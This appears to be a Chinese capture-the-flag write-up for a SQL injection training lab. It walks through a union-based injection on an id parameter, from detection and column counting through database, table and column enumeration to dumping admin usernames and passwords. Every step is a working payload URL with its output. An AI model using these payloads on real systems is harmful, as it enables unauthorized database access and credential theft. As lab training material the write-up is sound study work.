链接:https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7
1.判断是否存在注入点
http://rhiq8003.ia.aqlab.cn/?id=1ascas
返回错误—》存在注入
2.猜字段
http://rhiq8003.ia.aqlab.cn/?id=1%20order%20by%202(正常)
http://rhiq8003.ia.aqlab.cn/?id=1%20order%20by%203(错误)
3.判断通道
http://rhiq8003.ia.aqlab.cn/?id=1%20and%201=2%20%20union%20select%201,2
返回为2
4.数据库名,版本信息
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,database()
maoshe
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,version()
5.5.53
5.查表名,列名
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
admin,dirs,news,xss
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()
Id,username,password,paths,id,content,id,user,pass
6.查字段
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,group_concat(concat_ws('~',username,password)) from admin
admin~hellohack,ppt领取微信~zkaqbanban
7.get flag
hellohack
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)